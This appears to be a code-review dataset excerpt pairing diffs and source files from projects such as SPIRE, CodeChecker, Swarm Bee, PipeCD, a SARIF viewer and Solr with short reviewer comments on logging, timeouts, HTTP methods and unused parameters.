if spiffeID != data.SpiffeId {
csr, err = util.MakeCSR(key, data.SpiffeId)
if err != nil {
return nil, nil, fmt.Errorf("generate CSR for agent SVID: %v", err)
}
spiffeID = data.SpiffeId
}
attestReq := &node.AttestRequest{
AttestationData: data.AttestationData,
Csr: csr,
Response: data.Response,
}
if err := attestStream.Send(attestReq); err != nil {
return nil, nil, fmt.Errorf("sending attestation request to SPIRE server: %v", err)
}
attestResp, err = attestStream.Recv()
if err != nil {
return nil, nil, fmt.Errorf("attesting to SPIRE server: %v", err)
}
// if the response has no additional data then break out and parse
// the response.
if attestResp.Challenge == nil {
break
}
}
if fetchStream != nil {
fetchStream.CloseSend()
if _, err := fetchStream.Recv(); err != io.EOF {
a.c.Log.Warnf("received unexpected result on trailing recv: %v", err)
}
}
attestStream.CloseSend()
if _, err := attestStream.Recv(); err != io.EOF {
a.c.Log.Warnf("received unexpected result on trailing recv: %v", err)
}
svid, bundle, err := a.parseAttestationResponse(spiffeID, attestResp)
if err != nil {
return nil, nil, fmt.Errorf("parse attestation response: %v", err)
}
return svid, bundle, nil
}
func (a *attestor) serverConn(ctx context.Context, bundle []*x509.Certificate) (*grpc.ClientConn, error) {
config := grpcutil.GRPCDialerConfig{
Log: grpcutil.LoggerFromFieldLogger(a.c.Log),
CredFunc: a.serverCredFunc(bundle),
}
dialer := grpcutil.NewGRPCDialer(config)
return dialer.Dial(ctx, a.c.ServerAddress)
}
func (a *attestor) serverCredFunc(bundle []*x509.Certificate) func() (credentials.TransportCredentials, error) {
pool := x509.NewCertPool()
for _, c := range bundle {
pool.AddCert(c)
}
spiffePeer := &spiffe_tls.TLSPeer{
SpiffeIDs: []string{a.serverID().String()},
TrustRoots: pool,
}
// Explicitly not mTLS since we don't have an SVID yet
tlsConfig := spiffePeer.NewTLSConfig([]tls.Certificate{})
credFunc := func() (credentials.TransportCredentials, error) { return credentials.NewTLS(tlsConfig), nil }
return credFunc
}
func (a *attestor) parseAttestationResponse(id string, r *node.AttestResponse) (*x509.Certificate, []*x509.Certificate, error) {
if r.SvidUpdate == nil {
return nil, nil, errors.New("response missing svid update")
}
if len(r.SvidUpdate.Svids) < 1 {
return nil, nil, errors.New("no svid received")
}
svidMsg, ok := r.SvidUpdate.Svids[id]
if !ok {
return nil, nil, fmt.Errorf("incorrect svid: %s", id)
}
svid, err := x509.ParseCertificate(svidMsg.Cert)
if err != nil {
return nil, nil, fmt.Errorf("invalid svid: %v", err)
}
if r.SvidUpdate.Bundles == nil {
return nil, nil, errors.New("missing bundles")
}
bundle := r.SvidUpdate.Bundles[a.c.TrustDomain.String()]
if bundle == nil {
return nil, nil, errors.New("missing bundle")
}
bundleCerts, err := x509.ParseCertificates(bundle.CaCerts)
if err != nil {
return nil, nil, fmt.Errorf("invalid bundle: %v", bundle)
}
return svid, bundleCerts, nil
}
func (a *attestor) serverID() *url.URL {
return &url.URL{
Scheme: "spiffe",
Host: a.c.TrustDomain.Host,
Path: path.Join("spire", "server"),
}
}
| 1 | 9,958 | I'm worried about we hide some important log here | spiffe-spire | go |
@@ -625,7 +625,7 @@ def start_workers(actions_map, actions, context, analyzer_config_map,
callback=lambda results: worker_result_handler(
results, metadata, output_path,
context.analyzer_binaries)
- ).get(float('inf'))
+ ).get(31557600)
pool.close()
except Exception: | 1 | # -------------------------------------------------------------------------
# The CodeChecker Infrastructure
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
# -------------------------------------------------------------------------
"""
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import glob
import multiprocessing
import os
import shlex
import shutil
import signal
import sys
import traceback
import zipfile
from tu_collector import tu_collector
from codechecker_common import util, plist_parser
from codechecker_common.env import get_check_env
from codechecker_common.logger import get_logger
from . import gcc_toolchain
from .analyzers import analyzer_types
from .analyzers.clangsa.analyzer import ClangSA
from .analyzers.clangsa.statistics_collector import SpecialReturnValueCollector
LOG = get_logger('analyzer')
def print_analyzer_statistic_summary(statistics, status, msg=None):
"""
Print analyzer statistic summary for the given status code with the given
section heading message.
"""
has_status = sum((res.get(status, 0) for res in
(statistics[i] for i in statistics)))
if has_status and msg:
LOG.info(msg)
for analyzer_type, res in statistics.items():
successful = res[status]
if successful:
LOG.info(" %s: %s", analyzer_type, successful)
def worker_result_handler(results, metadata, output_path, analyzer_binaries):
"""
Print the analysis summary.
"""
if metadata is None:
metadata = {}
skipped_num = 0
reanalyzed_num = 0
statistics = {}
for res, skipped, reanalyzed, analyzer_type, _, sources in results:
if skipped:
skipped_num += 1
else:
if reanalyzed:
reanalyzed_num += 1
if analyzer_type not in statistics:
analyzer_bin = analyzer_binaries[analyzer_type]
analyzer_version = \
metadata.get('versions', {}).get(analyzer_bin)
statistics[analyzer_type] = {
"failed": 0,
"failed_sources": [],
"successful": 0,
"version": analyzer_version
}
if res == 0:
statistics[analyzer_type]['successful'] += 1
else:
statistics[analyzer_type]['failed'] += 1
statistics[analyzer_type]['failed_sources'].append(sources)
LOG.info("----==== Summary ====----")
print_analyzer_statistic_summary(statistics,
'successful',
'Successfully analyzed')
print_analyzer_statistic_summary(statistics,
'failed',
'Failed to analyze')
if reanalyzed_num:
LOG.info("Reanalyzed compilation commands: %d", reanalyzed_num)
if skipped_num:
LOG.info("Skipped compilation commands: %d", skipped_num)
metadata['skipped'] = skipped_num
metadata['analyzer_statistics'] = statistics
# check() created the result .plist files and additional, per-analysis
# meta information in forms of .plist.source files.
# We now soak these files into the metadata dict, as they are not needed
# as loose files on the disk... but synchronizing LARGE dicts between
# threads would be more error prone.
source_map = {}
for f in glob.glob(os.path.join(output_path, "*.source")):
with open(f, 'r') as sfile:
source_map[f[:-7]] = sfile.read().strip()
os.remove(f)
for f in glob.glob(os.path.join(output_path, 'failed', "*.error")):
err_file, _ = os.path.splitext(f)
plist_file = os.path.basename(err_file) + ".plist"
plist_file = os.path.join(output_path, plist_file)
metadata['result_source_files'].pop(plist_file, None)
metadata['result_source_files'].update(source_map)
# Progress reporting.
progress_checked_num = None
progress_actions = None
def init_worker(checked_num, action_num):
global progress_checked_num, progress_actions
progress_checked_num = checked_num
progress_actions = action_num
def save_output(base_file_name, out, err):
try:
if out:
with open(base_file_name + ".stdout.txt", 'w') as outf:
outf.write(out)
if err:
with open(base_file_name + ".stderr.txt", 'w') as outf:
outf.write(err)
except IOError as ioerr:
LOG.debug("Failed to save analyzer output")
LOG.debug(ioerr)
def save_metadata(result_file, analyzer_result_file, analyzed_source_file):
"""
Save some extra information next to the plist, .source
acting as an extra metadata file.
"""
with open(result_file + ".source", 'w') as orig:
orig.write(analyzed_source_file.replace(r'\ ', ' ') + "\n")
if os.path.exists(analyzer_result_file) and \
not os.path.exists(result_file):
os.rename(analyzer_result_file, result_file)
def is_ctu_active(source_analyzer):
"""
Check if CTU analysis is active for Clang Static Analyzer.
"""
if not isinstance(source_analyzer, ClangSA):
return False
return source_analyzer.is_ctu_available() and \
source_analyzer.is_ctu_enabled()
def prepare_check(action, analyzer_config_map, output_dir,
severity_map, skip_handler, statistics_data,
disable_ctu=False):
"""
Construct the source analyzer build the analysis command
and result handler for the analysis.
"""
reanalyzed = False
# Create a source analyzer.
source_analyzer = \
analyzer_types.construct_analyzer(action,
analyzer_config_map)
if disable_ctu:
# WARNING! can be called only on ClangSA
# Needs to be called before construct_analyzer_cmd
source_analyzer.disable_ctu()
if action.analyzer_type == ClangSA.ANALYZER_NAME and \
statistics_data:
# WARNING! Statistical checkers are only supported by Clang
# Static Analyzer right now.
stats_dir = statistics_data['stats_out_dir']
# WARNING Because both statistical checkers use the same config
# directory it is enough to add it only once. This might change later.
# Configuration arguments should be added before the checkers are
# enabled.
stats_cfg = \
SpecialReturnValueCollector.checker_analyze_cfg(stats_dir)
source_analyzer.add_checker_config(stats_cfg)
# Source is the currently analyzed source file
# there can be more in one buildaction.
source_analyzer.source_file = action.source
# The result handler for analysis is an empty result handler
# which only returns metadata, but can't process the results.
rh = source_analyzer.construct_result_handler(action,
output_dir,
severity_map,
skip_handler)
# NOTICE!
# The currently analyzed source file needs to be set before the
# analyzer command is constructed.
# The analyzer output file is based on the currently
# analyzed source.
rh.analyzed_source_file = action.source
if os.path.exists(rh.analyzer_result_file):
reanalyzed = True
# Construct the analyzer cmd.
analyzer_cmd = source_analyzer.construct_analyzer_cmd(rh)
return source_analyzer, analyzer_cmd, rh, reanalyzed
def handle_success(rh, result_file, result_base, skip_handler,
capture_analysis_output, success_dir):
"""
Result postprocessing is required if the analysis was
successful (mainly clang tidy output conversion is done).
Skipping reports for header files is done here too.
"""
if capture_analysis_output:
save_output(os.path.join(success_dir, result_base),
rh.analyzer_stdout, rh.analyzer_stderr)
rh.postprocess_result()
# Generated reports will be handled separately at store.
save_metadata(result_file, rh.analyzer_result_file,
rh.analyzed_source_file)
if skip_handler:
# We need to check the plist content because skipping
# reports in headers can be done only this way.
plist_parser.skip_report_from_plist(result_file,
skip_handler)
def handle_failure(source_analyzer, rh, zip_file, result_base, actions_map):
"""
If the analysis fails a debug zip is packed together which contains
build, analysis information and source files to be able to
reproduce the failed analysis.
"""
other_files = set()
action = rh.buildaction
try:
LOG.debug("Fetching other dependent files from analyzer "
"output...")
other_files.update(
source_analyzer.get_analyzer_mentioned_files(
rh.analyzer_stdout))
other_files.update(
source_analyzer.get_analyzer_mentioned_files(
rh.analyzer_stderr))
except Exception as ex:
LOG.debug("Couldn't generate list of other files "
"from analyzer output:")
LOG.debug(str(ex))
LOG.debug("Collecting debug data")
buildactions = [{
'file': action.source,
'command': action.original_command,
'directory': action.directory}]
for of in other_files:
mentioned_file = os.path.abspath(os.path.join(action.directory, of))
key = mentioned_file, action.target
mentioned_file_action = actions_map.get(key)
if mentioned_file_action is not None:
buildactions.append({
'file': mentioned_file_action.source,
'command': mentioned_file_action.original_command,
'directory': mentioned_file_action.directory})
else:
LOG.debug("Could not find %s in build actions.", key)
tu_collector.zip_tu_files(zip_file, buildactions)
# TODO: What about the dependencies of the other_files?
tu_collector.add_sources_to_zip(
zip_file,
map(lambda path: os.path.join(action.directory, path), other_files))
with zipfile.ZipFile(zip_file, 'a') as archive:
LOG.debug("[ZIP] Writing analyzer STDOUT to /stdout")
archive.writestr("stdout", rh.analyzer_stdout)
LOG.debug("[ZIP] Writing analyzer STDERR to /stderr")
archive.writestr("stderr", rh.analyzer_stderr)
LOG.debug("[ZIP] Writing extra information...")
archive.writestr("build-action", action.original_command)
archive.writestr("analyzer-command", ' '.join(rh.analyzer_cmd))
archive.writestr("return-code", str(rh.analyzer_returncode))
toolchain = gcc_toolchain.toolchain_in_args(
shlex.split(action.original_command))
if toolchain:
archive.writestr("gcc-toolchain-path", toolchain)
LOG.debug("ZIP file written at '%s'", zip_file)
# Remove files that successfully analyzed earlier on.
plist_file = result_base + ".plist"
if os.path.exists(plist_file):
os.remove(plist_file)
def check(check_data):
"""
Invoke clang with an action which called by processes.
Different analyzer object belongs to for each build action.
skiplist handler is None if no skip file was configured.
"""
actions_map, action, context, analyzer_config_map, \
output_dir, skip_handler, quiet_output_on_stdout, \
capture_analysis_output, analysis_timeout, \
analyzer_environment, ctu_reanalyze_on_failure, \
output_dirs, statistics_data = check_data
failed_dir = output_dirs["failed"]
success_dir = output_dirs["success"]
try:
# If one analysis fails the check fails.
return_codes = 0
reanalyzed = False
result_file = ''
source_analyzer, analyzer_cmd, rh, reanalyzed = \
prepare_check(action, analyzer_config_map,
output_dir, context.severity_map,
skip_handler, statistics_data)
# The analyzer invocation calls __create_timeout as a callback
# when the analyzer starts. This callback creates the timeout
# watcher over the analyzer process, which in turn returns a
# function, that can later be used to check if the analyzer quit
# because we killed it due to a timeout.
#
# We need to capture the "function pointer" returned by
# setup_process_timeout as reference, so that we may call it
# later. To work around scoping issues, we use a list here so the
# "function pointer" is captured by reference.
timeout_cleanup = [lambda: False]
if analysis_timeout and analysis_timeout > 0:
def __create_timeout(analyzer_process):
"""
Once the analyzer process is started, this method is
called. Set up a timeout for the analysis.
"""
timeout_cleanup[0] = util.setup_process_timeout(
analyzer_process, analysis_timeout)
else:
def __create_timeout(analyzer_process):
# If no timeout is given by the client, this callback
# shouldn't do anything.
pass
# Fills up the result handler with the analyzer information.
source_analyzer.analyze(analyzer_cmd, rh, analyzer_environment,
__create_timeout)
# If execution reaches this line, the analyzer process has quit.
if timeout_cleanup[0]():
LOG.warning("Analyzer ran too long, exceeding time limit "
"of %d seconds.", analysis_timeout)
LOG.warning("Considering this analysis as failed...")
rh.analyzer_returncode = -1
rh.analyzer_stderr = (">>> CodeChecker: Analysis timed out "
"after {0} seconds. <<<\n{1}") \
.format(analysis_timeout, rh.analyzer_stderr)
# If source file contains escaped spaces ("\ " tokens), then
# clangSA writes the plist file with removing this escape
# sequence, whereas clang-tidy does not. We rewrite the file
# names to contain no escape sequences for every analyzer.
result_file = rh.analyzer_result_file.replace(r'\ ', ' ')
result_base = os.path.basename(result_file)
ctu_active = is_ctu_active(source_analyzer)
ctu_suffix = '_CTU'
zip_suffix = ctu_suffix if ctu_active else ''
failure_type = "_unknown"
if rh.analyzer_returncode == 1:
failure_type = "_compile_error"
elif rh.analyzer_returncode == 254:
failure_type = "_crash"
zip_file = result_base + zip_suffix + failure_type + '.zip'
zip_file = os.path.join(failed_dir, zip_file)
ctu_zip_file = result_base + ctu_suffix + failure_type + '.zip'
ctu_zip_file = os.path.join(failed_dir, ctu_zip_file)
return_codes = rh.analyzer_returncode
source_file_name = os.path.basename(action.source)
if rh.analyzer_returncode == 0:
# Remove the previously generated error file.
if os.path.exists(zip_file):
os.remove(zip_file)
# Remove the previously generated CTU error file.
if os.path.exists(ctu_zip_file):
os.remove(ctu_zip_file)
handle_success(rh, result_file, result_base,
skip_handler, capture_analysis_output,
success_dir)
LOG.info("[%d/%d] %s analyzed %s successfully.",
progress_checked_num.value, progress_actions.value,
action.analyzer_type, source_file_name)
if skip_handler:
# We need to check the plist content because skipping
# reports in headers can be done only this way.
plist_parser.skip_report_from_plist(result_file,
skip_handler)
else:
LOG.error("Analyzing %s with %s %s failed!",
source_file_name,
action.analyzer_type,
"CTU" if ctu_active else "")
if not quiet_output_on_stdout:
LOG.error("\n%s", rh.analyzer_stdout)
LOG.error("\n%s", rh.analyzer_stderr)
handle_failure(source_analyzer, rh, zip_file, result_base,
actions_map)
if ctu_active and ctu_reanalyze_on_failure:
LOG.error("Try to reanalyze without CTU")
# Try to reanalyze with CTU disabled.
source_analyzer, analyzer_cmd, rh, reanalyzed = \
prepare_check(action,
analyzer_config_map,
output_dir,
context.severity_map,
skip_handler,
statistics_data,
True)
# Fills up the result handler with
# the analyzer information.
source_analyzer.analyze(analyzer_cmd,
rh,
analyzer_environment)
return_codes = rh.analyzer_returncode
if rh.analyzer_returncode == 0:
handle_success(rh, result_file, result_base,
skip_handler, capture_analysis_output,
success_dir)
LOG.info("[%d/%d] %s analyzed %s without"
" CTU successfully.",
progress_checked_num.value,
progress_actions.value,
action.analyzer_type,
source_file_name)
else:
LOG.error("Analyzing '%s' with %s without CTU failed.",
source_file_name, action.analyzer_type)
zip_file = result_base + '.zip'
zip_file = os.path.join(failed_dir, zip_file)
handle_failure(source_analyzer, rh, zip_file,
result_base, actions_map)
if not quiet_output_on_stdout:
if rh.analyzer_returncode:
LOG.error('\n%s', rh.analyzer_stdout)
LOG.error('\n%s', rh.analyzer_stderr)
else:
LOG.debug_analyzer('\n%s', rh.analyzer_stdout)
LOG.debug_analyzer('\n%s', rh.analyzer_stderr)
progress_checked_num.value += 1
return return_codes, False, reanalyzed, action.analyzer_type, \
result_file, action.source
except Exception as e:
LOG.debug_analyzer(str(e))
traceback.print_exc(file=sys.stdout)
return 1, False, reanalyzed, action.analyzer_type, None, \
action.source
def skip_cpp(compile_actions, skip_handler):
"""If there is no skiplist handler there was no skip list file in
the command line.
C++ file skipping is handled here.
"""
if not skip_handler:
return compile_actions, []
analyze = []
skip = []
for compile_action in compile_actions:
if skip_handler and skip_handler.should_skip(compile_action.source):
skip.append(compile_action)
else:
analyze.append(compile_action)
return analyze, skip
def start_workers(actions_map, actions, context, analyzer_config_map,
jobs, output_path, skip_handler, metadata,
quiet_analyze, capture_analysis_output, timeout,
ctu_reanalyze_on_failure, statistics_data, manager):
"""
Start the workers in the process pool.
For every build action there is worker which makes the analysis.
"""
# Handle SIGINT to stop this script running.
def signal_handler(*arg, **kwarg):
try:
pool.terminate()
manager.shutdown()
finally:
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
# Start checking parallel.
checked_var = multiprocessing.Value('i', 1)
actions_num = multiprocessing.Value('i', len(actions))
pool = multiprocessing.Pool(jobs,
initializer=init_worker,
initargs=(checked_var,
actions_num))
failed_dir = os.path.join(output_path, "failed")
# If the analysis has failed, we help debugging.
if not os.path.exists(failed_dir):
os.makedirs(failed_dir)
success_dir = os.path.join(output_path, "success")
# Analysis was successful processing results.
if not os.path.exists(success_dir):
os.makedirs(success_dir)
output_dirs = {'success': success_dir,
'failed': failed_dir}
# Construct analyzer env.
analyzer_environment = get_check_env(context.path_env_extra,
context.ld_lib_path_extra)
actions, skipped_actions = skip_cpp(actions, skip_handler)
analyzed_actions = [(actions_map,
build_action,
context,
analyzer_config_map,
output_path,
skip_handler,
quiet_analyze,
capture_analysis_output,
timeout,
analyzer_environment,
ctu_reanalyze_on_failure,
output_dirs,
statistics_data)
for build_action in actions]
if analyzed_actions:
try:
# Workaround, equivalent of map.
# The main script does not get signal
# while map or map_async function is running.
# It is a python bug, this does not happen if a timeout is
# specified, then receive the interrupt immediately.
pool.map_async(check,
analyzed_actions,
1,
callback=lambda results: worker_result_handler(
results, metadata, output_path,
context.analyzer_binaries)
).get(float('inf'))
pool.close()
except Exception:
pool.terminate()
raise
finally:
pool.join()
else:
LOG.info("----==== Summary ====----")
for skp in skipped_actions:
LOG.debug_analyzer("%s is skipped", skp.source)
LOG.info("Total analyzed compilation commands: %d", len(analyzed_actions))
LOG.info("----=================----")
if not os.listdir(success_dir):
shutil.rmtree(success_dir)
if not os.listdir(failed_dir):
shutil.rmtree(failed_dir)
| 1 | 10,402 | Python 3 will throw an exception for inf, but not providing a timeout will result in no timeout exception. | Ericsson-codechecker | c |
@@ -45,6 +45,18 @@ func (s *server) setupRouting() {
"POST": http.HandlerFunc(s.chunkUploadHandler),
})
+ router.Handle("/bzz-tag/name/{name}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getANewTag),
+ })
+
+ router.Handle("/bzz-tag/addr/{addr}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getTagInfoUsingAddress),
+ })
+
+ router.Handle("/bzz-tag/uuid/{uuid}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getTagInfoUsingUUid),
+ })
+
s.Handler = web.ChainHandlers(
logging.NewHTTPAccessLogHandler(s.Logger, logrus.InfoLevel, "api access"),
handlers.CompressHandler, | 1 | // Copyright 2020 The Swarm Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package api
import (
"fmt"
"net/http"
"github.com/ethersphere/bee/pkg/jsonhttp"
"github.com/ethersphere/bee/pkg/logging"
"github.com/gorilla/handlers"
"github.com/gorilla/mux"
"github.com/sirupsen/logrus"
"resenje.org/web"
)
func (s *server) setupRouting() {
router := mux.NewRouter()
router.NotFoundHandler = http.HandlerFunc(jsonhttp.NotFoundHandler)
router.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, "Ethereum Swarm Bee")
})
router.HandleFunc("/robots.txt", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, "User-agent: *\nDisallow: /")
})
router.Handle("/pingpong/{peer-id}", jsonhttp.MethodHandler{
"POST": http.HandlerFunc(s.pingpongHandler),
})
router.Handle("/bzz", jsonhttp.MethodHandler{
"POST": http.HandlerFunc(s.bzzUploadHandler),
})
router.Handle("/bzz/{address}", jsonhttp.MethodHandler{
"GET": http.HandlerFunc(s.bzzGetHandler),
})
router.Handle("/bzz-chunk/{addr}", jsonhttp.MethodHandler{
"GET": http.HandlerFunc(s.chunkGetHandler),
"POST": http.HandlerFunc(s.chunkUploadHandler),
})
s.Handler = web.ChainHandlers(
logging.NewHTTPAccessLogHandler(s.Logger, logrus.InfoLevel, "api access"),
handlers.CompressHandler,
// todo: add recovery handler
s.pageviewMetricsHandler,
web.FinalHandler(router),
)
}
| 1 | 10,180 | As this method changes the state, it should be `POST`. Also, maybe to rename it to `createTag`? | ethersphere-bee | go |
@@ -24,6 +24,6 @@ func (e *Executor) ensureTrafficSplit(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
-func (e *Executor) rollbackTraffic(ctx context.Context) model.StageStatus {
- return model.StageStatus_STAGE_SUCCESS
+func (e *Executor) rollbackTraffic(ctx context.Context) error {
+ return nil
} | 1 | // Copyright 2020 The PipeCD Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package kubernetes
import (
"context"
"github.com/pipe-cd/pipe/pkg/model"
)
func (e *Executor) ensureTrafficSplit(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
func (e *Executor) rollbackTraffic(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
| 1 | 7,930 | `ctx` is unused in rollbackTraffic | pipe-cd-pipe | go |
@@ -0,0 +1,12 @@
+
+using System;
+
+namespace SarifViewer
+{
+ internal sealed partial class Guids
+ {
+ public const string guidVSPackageString = "b97edb99-282e-444c-8f53-7de237f2ec5e";
+
+ public static Guid guidVSPackage = new Guid(guidVSPackageString);
+ }
+} | 1 | 1 | 10,010 | Roslyn conventions have const in PascalCase. | microsoft-sarif-sdk | .cs |
|
@@ -112,7 +112,7 @@ public class ZookeeperStatusHandler extends RequestHandlerBase {
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
List<String> dynamicHosts = zkDynamicConfig.getServers().stream()
- .map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
+ .map(h -> h.resolveClientPortAddress() + ":" + (h.clientPort != null ? h.clientPort : "2181"))
.sorted().collect(Collectors.toList());
if (!connStringHosts.containsAll(dynamicHosts)) {
errors.add("Your ZK connection string (" + connStringHosts.size() + " hosts) is different from the " + | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.handler.admin;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.io.Writer;
import java.lang.invoke.MethodHandles;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.stream.Collectors;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.cloud.SolrZkClient;
import org.apache.solr.common.cloud.ZkDynamicConfig;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.CoreContainer;
import org.apache.solr.handler.RequestHandlerBase;
import org.apache.solr.request.SolrQueryRequest;
import org.apache.solr.response.SolrQueryResponse;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Zookeeper Status handler, talks to ZK using sockets and four-letter words
*
* @since solr 7.5
*/
public class ZookeeperStatusHandler extends RequestHandlerBase {
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private static final int ZOOKEEPER_DEFAULT_PORT = 2181;
private static final String STATUS_RED = "red";
private static final String STATUS_GREEN = "green";
private static final String STATUS_YELLOW = "yellow";
private static final String STATUS_NA = "N/A";
private CoreContainer cores;
public ZookeeperStatusHandler(CoreContainer cc) {
this.cores = cc;
}
@Override
public String getDescription() {
return "Fetch Zookeeper status";
}
@Override
public Category getCategory() {
return Category.ADMIN;
}
@Override
@SuppressWarnings({"unchecked", "rawtypes"})
public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception {
NamedList values = rsp.getValues();
if (cores.isZooKeeperAware()) {
String zkHost = cores.getZkController().getZkServerAddress();
SolrZkClient zkClient = cores.getZkController().getZkClient();
final ZkDynamicConfig dynConfig = ZkDynamicConfig.parseLines(zkClient.getConfig());
values.add("zkStatus", getZkStatus(zkHost, dynConfig));
} else {
throw new SolrException(SolrException.ErrorCode.BAD_REQUEST, "The Zookeeper status API is only available in Cloud mode");
}
}
/**
* For each zk host, resolved either from zk connection string or from zk dynamic reconfiguration config,
* fetch all config and status info from ZK API and returns as a map, where key is hostname
* @param zkHost zookeeper connection string
* @param zkDynamicConfig list of zk dynamic config objects
* @return map of zookeeper config and status per zk host
*/
@SuppressWarnings({"unchecked"})
protected Map<String, Object> getZkStatus(String zkHost, ZkDynamicConfig zkDynamicConfig) {
final ZkDynamicConfig hostsFromConnectionString = ZkDynamicConfig.fromZkConnectString(zkHost);
final ZkDynamicConfig zookeepers;
boolean dynamicReconfig;
final List<String> errors = new ArrayList<>();
String status = STATUS_NA;
if (zkDynamicConfig.size() == 0) {
// Fallback to parsing zkHost for older zk servers without support for dynamic reconfiguration
dynamicReconfig = false;
zookeepers = hostsFromConnectionString;
} else {
dynamicReconfig = true;
List<String> connStringHosts = hostsFromConnectionString.getServers().stream()
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
List<String> dynamicHosts = zkDynamicConfig.getServers().stream()
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
if (!connStringHosts.containsAll(dynamicHosts)) {
errors.add("Your ZK connection string (" + connStringHosts.size() + " hosts) is different from the " +
"dynamic ensemble config (" + dynamicHosts.size() + " hosts). Solr does not currently support " +
"dynamic reconfiguration and will only be able to connect to the zk hosts in your connection string.");
status = STATUS_YELLOW;
}
zookeepers = zkDynamicConfig; // Clone input
}
final Map<String, Object> zkStatus = new HashMap<>();
final List<Object> details = new ArrayList<>();
int numOk = 0;
int standalone = 0;
int followers = 0;
int reportedFollowers = 0;
int leaders = 0;
zkStatus.put("ensembleSize", zookeepers.size());
zkStatus.put("zkHost", zkHost);
for (ZkDynamicConfig.Server zk : zookeepers.getServers()) {
final String zkClientHostPort = zk.resolveClientPortAddress() + ":" + zk.clientPort;
try {
Map<String, Object> stat = monitorZookeeper(zkClientHostPort);
if (stat.containsKey("errors")) {
errors.addAll((List<String>)stat.get("errors"));
stat.remove("errors");
}
details.add(stat);
if ("true".equals(String.valueOf(stat.get("ok")))) {
numOk++;
}
String state = String.valueOf(stat.get("zk_server_state"));
if ("follower".equals(state) || "observer".equals(state)) {
followers++;
} else if ("leader".equals(state)) {
leaders++;
reportedFollowers = Math.max(
Integer.parseInt((String) stat.getOrDefault("zk_followers", "0")),
Integer.parseInt((String) stat.getOrDefault("zk_synced_followers", "0"))
);
} else if ("standalone".equals(state)) {
standalone++;
}
if (zk.role != null) {
stat.put("role", zk.role);
}
} catch (SolrException se) {
log.warn("Failed talking to zookeeper {}", zkClientHostPort, se);
errors.add(se.getMessage());
Map<String, Object> stat = new HashMap<>();
stat.put("host", zkClientHostPort);
stat.put("ok", false);
status = STATUS_YELLOW;
details.add(stat);
}
}
zkStatus.put("details", details);
zkStatus.put("dynamicReconfig", dynamicReconfig);
if (followers+leaders > 0 && standalone > 0) {
status = STATUS_RED;
errors.add("The zk nodes do not agree on their mode, check details");
}
if (standalone > 1) {
status = STATUS_RED;
errors.add("Only one zk allowed in standalone mode");
}
if (leaders > 1) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("Only one leader allowed, got " + leaders);
}
if (followers > 0 && leaders == 0) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("We do not have a leader");
}
if (leaders > 0 && followers != reportedFollowers) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("Leader reports " + reportedFollowers + " followers, but we only found " + followers +
". Please check zkHost configuration");
}
if (followers+leaders == 0 && standalone == 1) {
zkStatus.put("mode", "standalone");
}
if (followers+leaders > 0 && (zookeepers.size())%2 == 0) {
if (!STATUS_RED.equals(status)) {
status = STATUS_YELLOW;
}
errors.add("We have an even number of zookeepers which is not recommended");
}
if (followers+leaders > 0 && standalone == 0) {
zkStatus.put("mode", "ensemble");
}
if (status.equals(STATUS_NA)) {
if (numOk == zookeepers.size()) {
status = STATUS_GREEN;
} else if (numOk < zookeepers.size() && numOk > zookeepers.size() / 2) {
status = STATUS_YELLOW;
errors.add("Some zookeepers are down: " + numOk + "/" + zookeepers.size());
} else {
status = STATUS_RED;
errors.add("Mismatch in number of zookeeper nodes live. numOK=" + numOk + ", expected " + zookeepers.size());
}
}
zkStatus.put("status", status);
if (!errors.isEmpty()) {
zkStatus.put("errors", errors);
}
return zkStatus;
}
protected Map<String, Object> monitorZookeeper(String zkHostPort) throws SolrException {
Map<String, Object> obj = new HashMap<>();
List<String> errors = new ArrayList<>();
obj.put("host", zkHostPort);
